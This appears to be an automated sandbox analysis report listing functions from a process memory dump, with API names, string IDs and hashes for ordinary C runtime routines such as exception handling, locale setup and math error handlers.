                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: eace6af2f1a7ebbb4b7aff053afb1977c84a43959c171a794db1e127813ce6e2
                                                                                                                                                                      • Instruction ID: e2875256b89a893a375c1160ec82804282e3fcd6d6c1bcd5b896dac7570ea5e4
                                                                                                                                                                      • Opcode Fuzzy Hash: eace6af2f1a7ebbb4b7aff053afb1977c84a43959c171a794db1e127813ce6e2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8691A173A08B858AE790EBA5E4403ADBBE0F744788F50413BEA9D27B55DF38D155C701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6DA80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: bee794e28527fa9dd78a6d9169989570187a9c92bc85060df153b9b73eff720a
                                                                                                                                                                      • Instruction ID: f884fa44ece5b8b689f4fd5f201d95c29e07cc415dc6a5cf7cbe7f6f2badc726
                                                                                                                                                                      • Opcode Fuzzy Hash: bee794e28527fa9dd78a6d9169989570187a9c92bc85060df153b9b73eff720a
                                                                                                                                                                      • Instruction Fuzzy Hash: C1515B33A08A858AE761DFA5E0403ADBBA0FB48B88F544136EE5D27B59CF78E145C711
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6E20C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 6b6b60d445c1a2224ee2a98b02a42136a49554e3719dd5277a76b90849d165cc
                                                                                                                                                                      • Instruction ID: 262293153d6988df2be093354d235d00d459edb92275221e51b800cfd1aab073
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b6b60d445c1a2224ee2a98b02a42136a49554e3719dd5277a76b90849d165cc
                                                                                                                                                                      • Instruction Fuzzy Hash: 8651D432908A4186DBB4EBA19644378BB95FBC4B85F844137DAAD67B85CF3CF450CB12
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D66CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                                                                                      • Opcode ID: 9e091129518374d68d5514e3c23e017341073b485b281ddb992ee9e541fd4d25
                                                                                                                                                                      • Instruction ID: 4c42180189c5ad239c6b4cd592b273fdbe1b451aa23c8d7f11e7054f741cc5b4
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e091129518374d68d5514e3c23e017341073b485b281ddb992ee9e541fd4d25
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C418D72B0AA41C9EB90EFB0D4903FC6BA4EF44708F844436DA4D73A56DE38D5229326
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6E444, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                      • Opcode ID: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction ID: ef5e6ee0d2879af45ec2e56a45af0d6e323c4eb9b8fc3449605f1198db078b89
                                                                                                                                                                      • Opcode Fuzzy Hash: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E71D332508A9186DBA0EFA5D250779BFA4FB80B84F948537DA5C27B85DF3CE460C712
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D70C6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-3916222277
                                                                                                                                                                      • Opcode ID: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction ID: 90267b4084831f1fa558607323d1a035f6d48c4aba167685f4172af354cb4fc6
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 0861EA3291821A8AE7E4EF68844433CBFA5FB05B0AF941177DB4E626D4CF38E451C762
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7B664, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      • Opcode ID: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction ID: dfb0872db957d64264115142a3f93317b897267b7b0c19a4ef0d4e626eb2e4f3
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C512862B187C546E7A5DF79D4413A9AF91EB80B90F889232C79C57BD6CE3CE044C712
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6EA74, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                                                                                      • Opcode ID: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction ID: ba4fa347b633e73c238e3ab51b9b8a4f125bba7c0a7a225a7ad0955d8a8ed3e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A516132618B4186D6A0EB56E54036DBBA4FB89B90F500136EBAD27B55CF3CE460CB12
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D83258, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction ID: 84113dca87132dd0516da6e34c34d49c9eadeb4737bd024073d17cf06e5955ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction Fuzzy Hash: 0641E522B18A4181DB60EFA5E4443B9BB60FB84794FC44032EE4D9B788DF3CE501C711
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D85E04, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_errorf
                                                                                                                                                                      • String ID: "$powf
                                                                                                                                                                      • API String ID: 2315412904-603753351
                                                                                                                                                                      • Opcode ID: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction ID: cd3a7c51a816c6987d6e8fef0e75b3d9a59589ac9db37467105bb86dda085a09
                                                                                                                                                                      • Opcode Fuzzy Hash: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction Fuzzy Hash: 28419273C28681DAD3B0CF62E0807BABAB0F799348F102336F74916998CB7DD5509B01
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D62D30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: ios_base::failbit set
                                                                                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                                                                                      • Opcode ID: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction ID: d89775b52b22b413fc9a2aa89213a8f499bf039a9ba2b253ba77f0c916abda8c
                                                                                                                                                                      • Opcode Fuzzy Hash: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: D431D522A18F8581EB509B64E4403A9E720FB98764F949332EBAC167D5EF7CE1D4C750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D85CE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$pow
                                                                                                                                                                      • API String ID: 1757819995-713443511
                                                                                                                                                                      • Opcode ID: cd39ec047a0f984d166b0bf4616c01effc3e6dcc66f47e544497a243a356f652
                                                                                                                                                                      • Instruction ID: e9c8d3553038f1b7530711d9877f7f18009b7e1a06aeebad3023bb03828e75d6
                                                                                                                                                                      • Opcode Fuzzy Hash: cd39ec047a0f984d166b0bf4616c01effc3e6dcc66f47e544497a243a356f652
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A316F72D18A8587E7A0DF50E04476AFAB1FBDA348F601326F6891A954DBBCE0859F01
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7CA88, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_errno_from_matherr
                                                                                                                                                                      • String ID: exp
                                                                                                                                                                      • API String ID: 1187470696-113136155
                                                                                                                                                                      • Opcode ID: 38fead14972a1eec31403cf24fe4bb4e0cf0cf9b1638df4f6de8ca42ef05cc45
                                                                                                                                                                      • Instruction ID: acaa45ef14db2baf623d19fb581b9d60833dd4b2dd2060c286016e9875b63298
                                                                                                                                                                      • Opcode Fuzzy Hash: 38fead14972a1eec31403cf24fe4bb4e0cf0cf9b1638df4f6de8ca42ef05cc45
                                                                                                                                                                      • Instruction Fuzzy Hash: 23211036A19685CBD7A0EF68A44136AFBA0FB99301F905136F68D93B55DF3CE4008F11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7EC8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareStringtry_get_function
                                                                                                                                                                      • String ID: CompareStringEx
                                                                                                                                                                      • API String ID: 3328479835-2590796910
                                                                                                                                                                      • Opcode ID: 7151cf555841e62792745c7ee48492f6c8567249aac293e9bf01437dc0ad6030
                                                                                                                                                                      • Instruction ID: c34a00e157d9ab645009d4b553e637223046929ee361891e49d83f8d4e831fee
                                                                                                                                                                      • Opcode Fuzzy Hash: 7151cf555841e62792745c7ee48492f6c8567249aac293e9bf01437dc0ad6030
                                                                                                                                                                      • Instruction Fuzzy Hash: A511FC36608B8186D7A0DB96F4402AABBA4FBC9B90F544136EECD93B59CF3CD5548B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7F140, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                                                                      • Opcode ID: 871af9d8ab282d3569e3073f6cd61f7e70fb74fcc2ea2c3338b270036ff96911
                                                                                                                                                                      • Instruction ID: f37866d9c8323a0e98ad2ba2a891661cf63a55b18a1cef3efaef6f75ba5c2076
                                                                                                                                                                      • Opcode Fuzzy Hash: 871af9d8ab282d3569e3073f6cd61f7e70fb74fcc2ea2c3338b270036ff96911
                                                                                                                                                                      • Instruction Fuzzy Hash: FB111F36A08B8186D7A0DB55F4403AAFBA4FBC9B90F544136EE8D93B59CF3CD5448B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D628A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 1838369231-1405518554
                                                                                                                                                                      • Opcode ID: 8dfaff509c755597ec061ef6071315be3bb42e56ada5acf187447b46f720058e
                                                                                                                                                                      • Instruction ID: 3ade1f7a9d681befead956bb287d869b001d88519c467a17a9e172eadf2007a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 8dfaff509c755597ec061ef6071315be3bb42e56ada5acf187447b46f720058e
                                                                                                                                                                      • Instruction Fuzzy Hash: 08016233505F8189C784EFB5A88026DBBA5FB58B84B58513ACB9C9371AEF38C4A1C351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6BB14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D685BE), ref: 00007FF7E3D6BB58
                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7E3D685BE), ref: 00007FF7E3D6BB9E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: bea819e4984341876aae97c79fcd7bc68fbabd3abac3cc71b665084c62774502
                                                                                                                                                                      • Instruction ID: 087be14e7d7f0dec47de6cc292fe86957d787932cb8c3fcb07ededd2e2f8b0ef
                                                                                                                                                                      • Opcode Fuzzy Hash: bea819e4984341876aae97c79fcd7bc68fbabd3abac3cc71b665084c62774502
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D113D32618B4582EB51DF16F440269BBA0FB88B88F984235DE9D17B58DF3CD5518701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7EFB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultUsertry_get_function
